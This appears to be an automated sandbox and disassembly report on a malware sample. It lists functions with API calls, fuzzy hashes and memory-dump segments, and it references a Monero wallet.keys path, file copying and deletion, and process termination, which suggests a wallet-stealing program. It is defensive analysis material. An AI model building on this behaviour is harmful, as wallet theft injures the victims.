Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpynlstrlenwsprintf
String ID: %s%s
API String ID: 1206339513-3252725368
Opcode ID: 150806ed609558c0d8544418e34c76d67d75315af0f709c48f6e22b5150ee926
Instruction ID: 5df33ea054577a39f4443dfc57613203b247693b0daec723d4eca2e23ba694c2
Opcode Fuzzy Hash: 150806ed609558c0d8544418e34c76d67d75315af0f709c48f6e22b5150ee926
Instruction Fuzzy Hash: 2A01CC75501108FFCB08DFECD984EAE7BB9FB48364F208249F9099B344C631AA41DB91

Function 006A6630 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 70COMMON

Download Yara Rule

APIs

GetModuleFileNameA.KERNEL32(00000000,?,00000104,?,0000003C,?,000003E8), ref: 006A6663

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

ShellExecuteEx.SHELL32(0000003C), ref: 006A6726
ExitProcess.KERNEL32 ref: 006A6755

Strings

<, xrefs: 006A66D9

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$ExecuteExitFileModuleNameProcessShelllstrcatlstrlen
String ID: <
API String ID: 1148417306-4251816714
Opcode ID: 91fe7c957b6084cb049f0d747435e9ad00cb4253c00cac037fbda50a6b7f0364
Instruction ID: 51fccbc823dd87218049062ac7967150cf907bacb44aa54f66cc7973267a3f59
Opcode Fuzzy Hash: 91fe7c957b6084cb049f0d747435e9ad00cb4253c00cac037fbda50a6b7f0364
Instruction Fuzzy Hash: 50312DB1D01218AFDB94FB90DC92BDE7779AF44300F40419AF20966191DF746B48CF5A

Function 006A87C0 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 64memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006B0E28,00000000,?), ref: 006A882F
RtlAllocateHeap.NTDLL(00000000), ref: 006A8836
wsprintfA.USER32 ref: 006A8850

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Strings

%dx%d, xrefs: 006A8847

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesslstrcpywsprintf
String ID: %dx%d
API String ID: 1695172769-2206825331
Opcode ID: 6ecba93a4f5197f878f8b606c01ed01711dd5a4076cf8226e8c9eb56aab0089d
Instruction ID: fab26cac4c670ed7a6adc53731e925ca5a2bc8c8cbe94f11eb8cf29124f85223
Opcode Fuzzy Hash: 6ecba93a4f5197f878f8b606c01ed01711dd5a4076cf8226e8c9eb56aab0089d
Instruction Fuzzy Hash: 012130B1A41204EFDB04DF94DD45FAEBBB8FB48701F20421AFA05A7280C7799D01CBA1

Function 006A8D50 Relevance: 7.0, APIs: 3, Strings: 1, Instructions: 20memoryCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,000000FA,?,?,006A951E,00000000), ref: 006A8D5B
RtlAllocateHeap.NTDLL(00000000), ref: 006A8D62
wsprintfW.USER32 ref: 006A8D78

Strings

%hs, xrefs: 006A8D6F

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateProcesswsprintf
String ID: %hs
API String ID: 769748085-2783943728
Opcode ID: a346ac70ed33f3f9ed9818defdd5a23553b99c66b5f96dc177b9a6a04c76b8d8
Instruction ID: 942bbe810ec5ea8580280938b1a2c30719b40d5ea8b047d67297156c97a92aa6
Opcode Fuzzy Hash: a346ac70ed33f3f9ed9818defdd5a23553b99c66b5f96dc177b9a6a04c76b8d8
Instruction Fuzzy Hash: 48E08CB0A41208BBDB04EF94DC0AE697BB8FB44702F2002A5FD0987280DA719E009B92

Function 0069D400 Relevance: 6.3, APIs: 4, Instructions: 252filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 006AA740: lstrcpy.KERNEL32(006B0E17,00000000), ref: 006AA788

Part of subcall function 006AA9B0: lstrlen.KERNEL32(?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006AA9C5
Part of subcall function 006AA9B0: lstrcpy.KERNEL32(00000000), ref: 006AAA04
Part of subcall function 006AA9B0: lstrcat.KERNEL32(00000000,00000000), ref: 006AAA12

Part of subcall function 006AA8A0: lstrcpy.KERNEL32(?,006B0E17), ref: 006AA905

Part of subcall function 006A8B60: GetSystemTime.KERNEL32(006B0E1A,0135A4B0,006B05AE,?,?,006913F9,?,0000001A,006B0E1A,00000000,?,01359078,?,\Monero\wallet.keys,006B0E17), ref: 006A8B86

Part of subcall function 006AA920: lstrcpy.KERNEL32(00000000,?), ref: 006AA972
Part of subcall function 006AA920: lstrcat.KERNEL32(00000000), ref: 006AA982

CopyFileA.KERNEL32(00000000,00000000,00000001), ref: 0069D481
lstrlen.KERNEL32(00000000), ref: 0069D698
lstrlen.KERNEL32(00000000), ref: 0069D6AC
DeleteFileA.KERNEL32(00000000), ref: 0069D72B

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen$Filelstrcat$CopyDeleteSystemTime
String ID:
API String ID: 211194620-0
Opcode ID: 8fc7b4fc635bf4d64abe8a9b290cdad828173bdba97620b97a52c5bfcc5114d1
Instruction ID: ef146df3853f2c4ef3331f23d8f9e6f708beb079a7015fb2c183f0550584b445
Opcode Fuzzy Hash: 8fc7b4fc635bf4d64abe8a9b290cdad828173bdba97620b97a52c5bfcc5114d1
Instruction Fuzzy Hash: BD91ED729111089ADB88FBE4DC92EEE737AAF15300F50416EF50766091EF346E49CF6A

Function 006A3560 Relevance: 6.1, APIs: 4, Instructions: 124COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: lstrcpy$lstrlen
String ID:
API String ID: 367037083-0
Opcode ID: feb9f1e61b8babbc37302c286045e7d4476759dbde1ac9b35866c03bee919b88
Instruction ID: 4eebf4283a0ca3caa17e81ca7ab584b76a0733f0ee2ba8c4774c02209fdccb19
Opcode Fuzzy Hash: feb9f1e61b8babbc37302c286045e7d4476759dbde1ac9b35866c03bee919b88
Instruction Fuzzy Hash: 5D416CB5D10209ABDB44FFE4D845AFEB77AAB45304F108019F51276390EB34AE45CFA6

Function 006A94D0 Relevance: 6.1, APIs: 4, Instructions: 89COMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 006A94EB

Part of subcall function 006A8D50: GetProcessHeap.KERNEL32(00000000,000000FA,?,?,006A951E,00000000), ref: 006A8D5B
Part of subcall function 006A8D50: RtlAllocateHeap.NTDLL(00000000), ref: 006A8D62
Part of subcall function 006A8D50: wsprintfW.USER32 ref: 006A8D78

OpenProcess.KERNEL32(00001001,00000000,?), ref: 006A95AB
TerminateProcess.KERNEL32(00000000,00000000), ref: 006A95C9
CloseHandle.KERNEL32(00000000), ref: 006A95D6

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Process$Heap$AllocateCloseHandleOpenTerminatememsetwsprintf
String ID:
API String ID: 3729781310-0
Opcode ID: ad56dded792c4d48383c894b41361319592759866fe1bc05c63714c7cd6d9d71
Instruction ID: 00c1d7247aa2cada6af53b3ec12bb35489ac731eb4e3feb5c44e3185b50aa4a2
Opcode Fuzzy Hash: ad56dded792c4d48383c894b41361319592759866fe1bc05c63714c7cd6d9d71
Instruction Fuzzy Hash: 9B313C71E012089FDB14EBD0CC49BEDB7B9FB45300F204559E506AB284DB74AE89CF51

Function 006A7980 Relevance: 6.1, APIs: 4, Instructions: 51memorytimeCOMMON

Download Yara Rule

APIs

GetProcessHeap.KERNEL32(00000000,00000104,?,?,?,?,006B0E00,00000000,?), ref: 006A79B0
RtlAllocateHeap.NTDLL(00000000), ref: 006A79B7
GetLocalTime.KERNEL32(?,?,?,?,?,006B0E00,00000000,?), ref: 006A79C4
wsprintfA.USER32 ref: 006A79F3

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000772000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000077F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000079F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AB000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000007AE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000835000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000855000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000085B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000008DA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.00000000008EE000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000A81000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B61000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B8A000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000B91000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991010841.0000000000BA0000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991259970.0000000000BA1000.00000080.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991368030.0000000000D4B000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1991385670.0000000000D4C000.00000080.00000001.01000000.00000003.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_690000_file.jbxd

Yara matches

Similarity

API ID: Heap$AllocateLocalProcessTimewsprintf
String ID:
API String ID: 377395780-0
Opcode ID: 07abde08ea2fa19c5793be513631f6deadbeb0c139b64c6d396d036c1a624299
Instruction ID: 3f42e3b0e47451a647fbbaf998420d2af77329c5588b1f72523a10e15f18db93
Opcode Fuzzy Hash: 07abde08ea2fa19c5793be513631f6deadbeb0c139b64c6d396d036c1a624299
Instruction Fuzzy Hash: E3112AB2904118ABCB14DFC9DD45BBEB7F8FB4CB11F10421AFA05A2280D7399940DBB1

Function 006AC742 Relevance: 6.0, APIs: 4, Instructions: 34COMMONLIBRARYCODE

Download Yara Rule

APIs

__getptd.LIBCMT ref: 006AC74E

Part of subcall function 006ABF9F: __amsg_exit.LIBCMT ref: 006ABFAF

__getptd.LIBCMT ref: 006AC765
__amsg_exit.LIBCMT ref: 006AC773
__updatetlocinfoEx_nolock.LIBCMT ref: 006AC797

Memory Dump Source

Source File: 00000000.00000002.1990623591.0000000000691000.00000040.00000001.01000000.00000003.sdmp, Offset: 00690000, based on PE: true

Associated: 00000000.00000002.1990607379.0000000000690000.00000004.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.00000000006EA000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000715000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000718000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000071F000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000722000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.0000000000741000.00000040.00000001.01000000.00000003.sdmpDownload File
Associated: 00000000.00000002.1990623591.000000000074D000.00000040.00000001.01000000.00000003.sdmpDownload File
